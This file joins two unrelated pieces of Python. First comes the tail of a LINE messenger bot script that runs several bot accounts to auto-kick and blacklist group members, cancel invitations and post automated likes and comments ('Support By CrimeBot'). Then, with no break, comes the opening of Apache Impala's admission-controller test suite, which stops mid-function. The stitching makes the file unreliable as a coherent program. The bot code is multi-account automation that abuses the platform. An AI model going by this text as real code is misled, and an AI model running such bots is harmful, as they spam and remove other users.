G.preventJoinByTicket = False ki3.updateGroup(G) Ticket = ki3.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki3.updateGroup(G) else: G = cl.getGroup(op.param1) ki3.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki3.updateGroup(G) Ticket = ki3.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki3.updateGroup(G) elif op.param3 in ki4mid: if op.param2 in ki5mid: G = ki5.getGroup(op.param1) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True cl.updateGroup(G) else: G = ki5.getGroup(op.param1) ki5.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki5.updateGroup(G) elif op.param3 in ki5mid: if op.param2 in ki4mid: G = ki4.getGroup(op.param1) G.preventJoinByTicket = False ki4.updateGroup(G) Ticket = ki4.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki4.updateGroup(G) else: G = ki4.getGroup(op.param1) ki4.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki4.updateGroup(G) Ticket = ki4.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki4.updateGroup(G) elif op.param3 in ki6mid: if op.param2 in ki5mid: G = ki5.getGroup(op.param1) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki5.updateGroup(G) else: G = ki5.getGroup(op.param1) ki5.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki5.updateGroup(G) Ticket = ki5.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki5.updateGroup(G) elif op.param3 in ki7mid: if op.param2 in ki6mid: G = ki6.getGroup(op.param1) G.preventJoinByTicket = False ki6.updateGroup(G) Ticket = ki6.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki6.updateGroup(G) else: G = ki6.getGroup(op.param1) ki6.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki6.updateGroup(G) Ticket = ki6.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki6.updateGroup(G) elif op.param3 in ki8mid: if op.param2 in ki7mid: G = ki7.getGroup(op.param1) G.preventJoinByTicket = False ki7.updateGroup(G) Ticket = ki7.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) ki8.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki7.updateGroup(G) else: G = ki7.getGroup(op.param1) ki7.kickoutFromGroup(op.param1,[op.param2]) G.preventJoinByTicket = False ki7.updateGroup(G) Ticket = ki7.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) ki.acceptGroupInvitationByTicket(op.param1,Ticket) ki2.acceptGroupInvitationByTicket(op.param1,Ticket) ki3.acceptGroupInvitationByTicket(op.param1,Ticket) ki4.acceptGroupInvitationByTicket(op.param1,Ticket) ki5.acceptGroupInvitationByTicket(op.param1,Ticket) ki6.acceptGroupInvitationByTicket(op.param1,Ticket) ki7.acceptGroupInvitationByTicket(op.param1,Ticket) ki8.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki7.updateGroup(G) except: pass if op.type == 17: if op.param2 not in Bots: if op.param2 in Bots: pass if wait["protect"] == True: if wait["blacklist"][op.param2] == True: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) G = random.choice(KAC).getGroup(op.param1) G.preventJoinByTicket = True ki4.updateGroup(G) # random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: # pass try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) G = random.choice(KAC).getGroup(op.param1) G.preventJoinByTicket = True random.choice(KAC).updateGroup(G) # random.choice(KAK).kickoutFromGroup(op.param1,[op.param2]) except: pass elif op.param2 not in admin + Bots: random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!") else: pass if op.type == 19: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["protect"] == True: wait ["blacklist"][op.param2] = True random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.type == 13: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["inviteprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["cancelprotect"] == True: wait ["blacklist"][op.param2] = True cl.cancelGroupInvitation(op.param1,[op.param3]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.type == 11: if op.param2 not in Bots: if op.param2 in Bots: pass elif wait["linkprotect"] == True: wait ["blacklist"][op.param2] = True G = ki.getGroup(op.param1) G.preventJoinByTicket = True ki.updateGroup(G) random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) else: cl.sendText(op.param1,"") else: cl.sendText(op.param1,"") if op.type == 5: if wait["autoAdd"] == True: if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) #------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------ if op.type == 55: print "[NOTIFIED_READ_MESSAGE]" try: if op.param1 in wait2['readPoint']: Nama = cl.getContact(op.param2).displayName if Nama in wait2['readMember'][op.param1]: pass else: wait2['readMember'][op.param1] += "\n-> " + Nama wait2['ROM'][op.param1][op.param2] = "-> " + Nama wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S') else: cl.sendText except: pass if op.type == 59: print op except Exception as error: print error def a2(): now2 = datetime.now() nowT = datetime.strftime(now2,"%M") if nowT[14:] in ["10","20","30","40","50","00"]: return False else: return True def autolike(): for zx in range(0,20): hasil = cl.activity(limit=20) if hasil['result']['posts'][zx]['postInfo']['liked'] == False: try: cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002) cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like by Naufal Blaze") kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002) kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Support By CrimeBot") print "Like" except: pass else: print "Sudah di Like" time.sleep(500) thread2 = threading.Thread(target=autolike) thread2.daemon = True thread2.start() def nameUpdate(): while True: try: #while a2(): #pass if wait["clock"] == True: now2 = datetime.now() nowT = datetime.strftime(now2,"(%H:%M)") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) time.sleep(600) except: pass thread2 = threading.Thread(target=nameUpdate) thread2.daemon = True thread2.start() while True: try: Ops = cl.fetchOps(cl.Poll.rev, 5) except EOFError: raise Exception("It might be wrong revision\n" + str(cl.Poll.rev)) for Op in Ops: if (Op.type != OpType.END_OF_OPERATION): cl.Poll.rev = max(cl.Poll.rev, Op.revision) bot(Op)
test_admission_controller.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # Tests admission control import itertools import logging import math import os import pytest import re import shutil import sys import threading from copy import copy from time import sleep, time from beeswaxd.BeeswaxService import QueryState from tests.beeswax.impala_beeswax import ImpalaBeeswaxException from tests.common.custom_cluster_test_suite import CustomClusterTestSuite from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties from tests.common.impala_test_suite import ImpalaTestSuite from tests.common.resource_pool_config import ResourcePoolConfig from tests.common.skip import ( SkipIfS3, SkipIfABFS, SkipIfADLS, SkipIfEC, SkipIfNotHdfsMinicluster, SkipIfOS) from tests.common.test_dimensions import ( create_single_exec_option_dimension, create_uncompressed_text_dimension) from tests.common.test_vector import ImpalaTestDimension from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session from tests.util.web_pages_util import ( get_num_completed_backends, get_mem_admitted_backends_debug_page) from tests.verifiers.mem_usage_verifier import MemUsageVerifier from ImpalaService import ImpalaHiveServer2Service from TCLIService import TCLIService LOG = logging.getLogger('admission_test') # The query used for testing. It is important that this query returns many rows # while keeping fragments active on all backends. This allows a thread to keep # the query active and consuming resources by fetching one row at a time. The # where clause is for debugging purposes; each thread will insert its id so # that running queries can be correlated with the thread that submitted them. QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30) # The statestore heartbeat and topic update frequency (ms). Set low for testing. STATESTORE_RPC_FREQUENCY_MS = 100 # Time to sleep (in milliseconds) between issuing queries. When the delay is at least # the statestore heartbeat frequency, all state should be visible by every impalad by # the time the next query is submitted. Otherwise the different impalads will see stale # state for some admission decisions. SUBMISSION_DELAY_MS = \ [0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2] # The number of queries to submit. The test does not support fewer queries than # MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic # simple. NUM_QUERIES = [15, 30, 50] # Whether we will submit queries to all available impalads (in a round-robin fashion) ROUND_ROBIN_SUBMISSION = [True, False] # The query pool to use. The impalads should be configured to recognize this # pool with the parameters below. POOL_NAME = "default-pool" # Stress test timeout (seconds). The timeout needs to be significantly higher for # slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241). STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600) # The number of queries that can execute concurrently in the pool POOL_NAME. MAX_NUM_CONCURRENT_QUERIES = 5 # The number of queries that can be queued in the pool POOL_NAME MAX_NUM_QUEUED_QUERIES = 10 # Mem limit (bytes) used in the mem limit test MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024 _STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} " "-statestore_priority_update_frequency_ms={freq_ms}").format( freq_ms=STATESTORE_RPC_FREQUENCY_MS) # Name of the subscriber metric tracking the admission control update interval. REQUEST_QUEUE_UPDATE_INTERVAL =\ 'statestore-subscriber.topic-impala-request-queue.update-interval' # Key in the query profile for the query options. PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): " # The different ways that a query thread can end its query. QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE'] # The timeout used for the QUERY_TIMEOUT end behaviour QUERY_END_TIMEOUT_S = 1 # Value used for --admission_control_stale_topic_threshold_ms in tests. STALE_TOPIC_THRESHOLD_MS = 500 # Regex that matches the first part of the profile info string added when a query is # queued. INITIAL_QUEUE_REASON_REGEX = \ "Initial admission queue reason: waited [0-9]* ms, reason: .*" # The path to resources directory which contains the admission control config files. RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources") def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem, proc_mem_limit=None, queue_wait_timeout_ms=None): extra_flags = "" if proc_mem_limit is not None: extra_flags += " -mem_limit={0}".format(proc_mem_limit) if queue_wait_timeout_ms is not None: extra_flags += " -queue_wait_timeout_ms={0}".format(queue_wait_timeout_ms) return ("-vmodule admission-controller=3 -default_pool_max_requests {0} " "-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format( max_requests, max_queued, pool_max_mem, extra_flags)) def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file, additional_args="", make_copy=False): fs_allocation_path = os.path.join(RESOURCES_DIR, fs_allocation_file) llama_site_path = os.path.join(RESOURCES_DIR, llama_site_file) if make_copy: copy_fs_allocation_path = os.path.join(RESOURCES_DIR, "copy-" + fs_allocation_file) copy_llama_site_path = os.path.join(RESOURCES_DIR, "copy-" + llama_site_file) shutil.copy2(fs_allocation_path, copy_fs_allocation_path) shutil.copy2(llama_site_path, copy_llama_site_path) fs_allocation_path = copy_fs_allocation_path llama_site_path = copy_llama_site_path return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s " "-llama_site_path %s %s" % (fs_allocation_path, llama_site_path, additional_args)) def log_metrics(log_prefix, metrics): LOG.info("%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, " "released=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'], metrics['dequeued'], metrics['rejected'], metrics['released'], metrics['timed-out']) def compute_metric_deltas(m2, m1): """Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)""" return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in m2.keys()) def metric_key(pool_name, metric_name): """Helper method to construct the admission controller metric keys""" return "admission-controller.%s.%s" % (metric_name, pool_name) class TestAdmissionControllerBase(CustomClusterTestSuite): @classmethod def get_workload(self): return 'functional-query' @classmethod def add_test_dimensions(cls): super(TestAdmissionControllerBase, cls).add_test_dimensions() cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension()) # There's no reason to test this on other file formats/compression codecs right now cls.ImpalaTestMatrix.add_dimension( create_uncompressed_text_dimension(cls.get_workload())) class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite): def __check_pool_rejected(self, client, pool, expected_error_re): try: client.set_configuration({'request_pool': pool}) client.execute("select 1") assert False, "Query should return error" except ImpalaBeeswaxException as e: assert re.search(expected_error_re, str(e)) def __check_query_options(self, profile, expected_query_options): """Validate that the expected per-pool query options were set on the specified profile. expected_query_options is a list of "KEY=VALUE" strings, e.g. ["MEM_LIMIT=1", ...]""" confs = [] for line in profile.split("\n"): if PROFILE_QUERY_OPTIONS_KEY in line: rhs = re.split(": ", line)[1] confs = re.split(",", rhs) break expected_set = set([x.lower() for x in expected_query_options]) confs_set = set([x.lower() for x in confs]) assert expected_set.issubset(confs_set) def __check_hs2_query_opts(self, pool_name, mem_limit=None, expected_options=None): """ Submits a query via HS2 (optionally with a mem_limit in the confOverlay) into pool_name and checks that the expected_query_options are set in the profile.""" execute_statement_req = TCLIService.TExecuteStatementReq() execute_statement_req.sessionHandle = self.session_handle execute_statement_req.confOverlay = {'request_pool': pool_name} if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit execute_statement_req.statement = "select 1" execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req) HS2TestSuite.check_response(execute_statement_resp) fetch_results_req = TCLIService.TFetchResultsReq() fetch_results_req.operationHandle = execute_statement_resp.operationHandle fetch_results_req.maxRows = 1 fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req) HS2TestSuite.check_response(fetch_results_resp) close_operation_req = TCLIService.TCloseOperationReq() close_operation_req.operationHandle = execute_statement_resp.operationHandle HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req)) get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq() get_profile_req.operationHandle = execute_statement_resp.operationHandle get_profile_req.sessionHandle = self.session_handle get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req) HS2TestSuite.check_response(get_profile_resp) self.__check_query_options(get_profile_resp.profile, expected_options) def _execute_and_collect_profiles(self, queries, timeout_s, config_options={}, allow_query_failure=False): """Submit the query statements in 'queries' in parallel to the first impalad in the cluster. After submission, the results are fetched from the queries in sequence and their profiles are collected. Wait for up to timeout_s for each query to finish. If 'allow_query_failure' is True, succeeds if the query completes successfully or ends up in the EXCEPTION state. Otherwise expects the queries to complete successfully. Returns the profile strings.""" client = self.cluster.impalads[0].service.create_beeswax_client() expected_states = [client.QUERY_STATES['FINISHED']] if allow_query_failure: expected_states.append(client.QUERY_STATES['EXCEPTION']) try: handles = [] profiles = [] client.set_configuration(config_options) for query in queries: handles.append(client.execute_async(query)) for query, handle in zip(queries, handles): state = self.wait_for_any_state(handle, expected_states, timeout_s) if state == client.QUERY_STATES['FINISHED']: self.client.fetch(query, handle) profiles.append(self.client.get_runtime_profile(handle)) return profiles finally: client.close() @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml"), default_query_options=[('mem_limit', 200000000)], statestored_args=_STATESTORED_ARGS) @needs_session(conf_overlay={'batch_size': '100'}) def test_set_request_pool(self): """Tests setting the REQUEST_POOL with the pool placement policy configured to require a specific pool, and validate that the per-pool configurations were applied.""" impalad = self.cluster.impalads[0] client = impalad.service.create_beeswax_client() # Expected default mem limit for queueA, used in several tests below queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024) try: for pool in ['', 'not_a_pool_name']: expected_error =\ "No mapping found for request from user '\S+' with requested pool '%s'"\ % (pool) self.__check_pool_rejected(client, pool, expected_error) # Check rejected if user does not have access. expected_error = "Request from user '\S+' with requested pool 'root.queueC' "\ "denied access to assigned pool 'root.queueC'" self.__check_pool_rejected(client, 'root.queueC', expected_error) # Also try setting a valid pool client.set_configuration({'request_pool': 'root.queueB'}) result = client.execute("select 1") # Query should execute in queueB which doesn't have a default mem limit set in the # llama-site.xml, so it should inherit the value from the default process query # options. self.__check_query_options(result.runtime_profile, ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB']) # Try setting the pool for a queue with a very low queue timeout. # queueA allows only 1 running query and has a queue timeout of 50ms, so the # second concurrent query should time out quickly. client.set_configuration({'request_pool': 'root.queueA'}) handle = client.execute_async("select sleep(1000)") self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout") assert client.get_state(handle) == client.QUERY_STATES['FINISHED'] # queueA has default query options mem_limit=128m,query_timeout_s=5 self.__check_query_options(client.get_runtime_profile(handle), [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA']) client.close_query(handle) # Should be able to set query options via the set command (overriding defaults if # applicable). mem_limit overrides the pool default. abort_on_error has no # proc/pool default. client.execute("set mem_limit=31337") client.execute("set abort_on_error=1") result = client.execute("select 1") self.__check_query_options(result.runtime_profile, ['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA']) # Should be able to set query options (overriding defaults if applicable) with the # config overlay sent with the query RPC. mem_limit is a pool-level override and # max_io_buffers has no proc/pool default. client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'}) result = client.execute("select 1") self.__check_query_options(result.runtime_profile, ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', 'ABORT_ON_ERROR=1']) # Once options are reset to their defaults, the queue # configuration should kick back in. We'll see the # queue-configured mem_limit, and we won't see # abort on error, because it's back to being the default. client.execute('set mem_limit=""') client.execute('set abort_on_error=""') client.set_configuration({'request_pool': 'root.queueA'}) result = client.execute("select 1") self.__check_query_options(result.runtime_profile, [queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5']) finally: client.close() # HS2 tests: # batch_size is set in the HS2 OpenSession() call via the requires_session() test # decorator, so that is included in all test cases below. batch_size = "BATCH_SIZE=100" # Check HS2 query in queueA gets the correct query options for the pool. self.__check_hs2_query_opts("root.queueA", None, [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size]) # Check overriding the mem limit sent in the confOverlay with the query. self.__check_hs2_query_opts("root.queueA", '12345', ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size]) # Check HS2 query in queueB gets the process-wide default query options self.__check_hs2_query_opts("root.queueB", None, ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size]) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml", additional_args="-require_username"), statestored_args=_STATESTORED_ARGS) def test_require_user(self): open_session_req = TCLIService.TOpenSessionReq() open_session_req.username = "" open_session_resp = self.hs2_client.OpenSession(open_session_req) TestAdmissionController.check_response(open_session_resp) try: execute_statement_req = TCLIService.TExecuteStatementReq() execute_statement_req.sessionHandle = open_session_resp.sessionHandle execute_statement_req.statement = "select count(1) from functional.alltypes" execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req) self.wait_for_operation_state(execute_statement_resp.operationHandle, TCLIService.TOperationState.ERROR_STATE) get_operation_status_resp = self.get_operation_status( execute_statement_resp.operationHandle) assert "User must be specified" in get_operation_status_resp.errorMessage finally: close_req = TCLIService.TCloseSessionReq() close_req.sessionHandle = open_session_resp.sessionHandle TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req)) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_trivial_coord_query_limits(self): """Tests that trivial coordinator only queries have negligible resource requirements. """ if self.exploration_strategy() != 'exhaustive': pytest.skip('runs only in exhaustive') # Queries with only constant exprs or limit 0 should be admitted. self.execute_query_expect_success(self.client, "select 1") self.execute_query_expect_success(self.client, "select * from functional.alltypes limit 0") non_trivial_queries = [ "select * from functional.alltypesagg limit 1", "select * from functional.alltypestiny"] for query in non_trivial_queries: ex = self.execute_query_expect_failure(self.client, query) assert re.search("Rejected query from pool default-pool: request memory needed " ".* is greater than pool max mem resources 10.00 MB \(configured " "statically\)", str(ex)) @SkipIfS3.hdfs_block_size @SkipIfABFS.hdfs_block_size @SkipIfADLS.hdfs_block_size @SkipIfEC.fix_later @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_memory_rejection(self, vector): """Test that rejection of queries based on reservation and estimates works as expected. The test depends on scanner memory estimates, which different on remote filesystems with different (synthetic) block sizes.""" # Test that the query will be rejected by admission control if: # a) the largest per-backend min buffer reservation is larger than the query mem limit # b) the largest per-backend min buffer reservation is larger than the # buffer_pool_limit query option # c) the cluster-wide min-buffer reservation size is larger than the pool memory # resources. self.run_test_case('QueryTest/admission-reject-min-reservation', vector) # Test that queries are rejected based on memory estimates. Set num_nodes=1 to # avoid unpredictability from scheduling on different backends. exec_options = vector.get_value('exec_option') exec_options['num_nodes'] = 1 self.run_test_case('QueryTest/admission-reject-mem-estimate', vector) # Process mem_limit used in test_mem_limit_upper_bound PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024 @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT)) def test_mem_limit_upper_bound(self, vector): """ Test to ensure that a query is admitted if the requested memory is equal to the process mem limit""" query = "select * from functional.alltypesagg limit 1" exec_options = vector.get_value('exec_option') # Setting requested memory equal to process memory limit exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT self.execute_query_expect_success(self.client, query, exec_options) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT), num_exclusive_coordinators=1) def test_mem_limit_dedicated_coordinator(self, vector): """Regression test for IMPALA-8469: coordinator fragment should be admitted on dedicated coordinator""" query = "select * from functional.alltypesagg limit 1" exec_options = vector.get_value('exec_option') # Test both single-node and distributed plans for num_nodes in [0, 1]: # Memory just fits in memory limits exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT exec_options['num_nodes'] = num_nodes self.execute_query_expect_success(self.client, query, exec_options) # A bit too much memory to run on coordinator. exec_options['mem_limit'] = long(self.PROC_MEM_TEST_LIMIT * 1.1) ex = self.execute_query_expect_failure(self.client, query, exec_options) assert ("Rejected query from pool default-pool: request memory needed " "1.10 GB is greater than memory available for admission 1.00 GB" in str(ex)), str(ex) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1, cluster_size=2) def test_dedicated_coordinator_mem_accounting(self, vector): """Verify that when using dedicated coordinators, the memory admitted for and the mem limit applied to the query fragments running on the coordinator is different than the ones on executors.""" 